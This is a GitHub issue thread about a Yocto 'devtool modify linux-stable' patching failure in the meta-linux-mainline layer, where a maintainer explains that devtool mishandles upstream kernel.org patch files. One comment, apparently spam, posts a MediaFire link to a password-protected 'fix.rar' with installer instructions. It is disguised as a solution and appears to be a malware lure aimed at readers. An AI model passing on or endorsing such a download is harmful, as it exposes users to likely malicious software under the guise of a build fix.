### ISSUE TITLE
Devtool on Scarthgap patching problem

### ISSUE THREAD

**Issue by nevelshute** [betafive/meta-linux-mainline#23]
Presently, we are having a problem using the devtool to pull out/modify a kernel. We presently have no layers of our own, so no modifications  and the yocto completes a build. We only the following layers from the community:

 **_BBLAYERS ?= " \
  ${TOPDIR}/../poky/meta \
  ${TOPDIR}/../poky/meta-poky \
  ${TOPDIR}/../poky/meta-yocto-bsp \
  ${TOPDIR}/../meta-linux-mainline \
  ${TOPDIR}/../meta-arm/meta-arm-toolchain \
  ${TOPDIR}/../meta-arm/meta-arm \
  ${TOPDIR}/../meta-openembedded/meta-oe \
  ${TOPDIR}/../meta-openembedded/meta-python \
  ${TOPDIR}/../meta-openembedded/meta-initramfs \
  ${TOPDIR}/../meta-openembedded/meta-multimedia \
  ${TOPDIR}/../meta-openembedded/meta-networking \
"_**

When we try and pull/modify any version of the kernel with _**"devtool modify linux-stable",**_ we get the following error:

**_ERROR: Applying patch 'linux-6.10.6.patch' on target directory '/OurBuild/build/tmp/work/qemux86_64-poky-linux/linux-stable/6.10.6/devtooltmp-n8nhjtt_/workdir/linux-6.10'
CmdError('sh -c \'PATCHFILE="linux-6.10.6.patch" git -c user.name="OpenEmbedded" -c user.email="oe.patch@oe" commit -F /tmp/tmpceg_mto6 --no-verify\'', 0, 'stdout: 
stderr: Aborting commit due to empty commit message.
')
ERROR: Logfile of failure stored in: /OurBuild/build/tmp/work/qemux86_64-poky-linux/linux-stable/6.10.6/devtooltmp-n8nhjtt_/temp/log.do_patch.1406990_**

We have tried with other architectures, such as the arm64, but all give us the same error report and we have tried with other layers, such as the rockchip meta layer, to verify that we can pull out/modify a kernel with the devtool and have had no problems. 
Please advise.

**Comment by Taiga-A** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by pbrkr** [comment]
I suspect devtool needs to be extended to support our use of the upstream patch files in this layer.

What's your goal here? Are you planning to start with the 6.10.6 kernel and add patches of your own?

**Comment by nevelshute** [comment]
No, we are on 6.1.xx and then add our patches.

**Comment by pbrkr** [comment]
This issue here is that devtool doesn't differentiate between patch files provided as part of a meta layer (which can usually be applied as git commits) and patch files provided by an upstream project (which may or may not be suitable for applying as git commits).

We use the upstream patch files from kernel.org in this layer to reduce the amount of data that needs to be fetched before a build can start. I guess the alternative would be to use the linux stable git repository (https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git), but this would require a huge initial download due to the size of that repo. I'm not a fan of that.

I recommend trying to fix this upstream in Yocto Project.

**Comment by nevelshute** [comment]
We understand and agree. Thanks

**Comment by pbrkr** [comment]
> We understand and agree. Thanks

Ok, I'm going to close this here. We can re-open if needed in the future though.

**Comment by nevelshute** [comment]
Agreed!
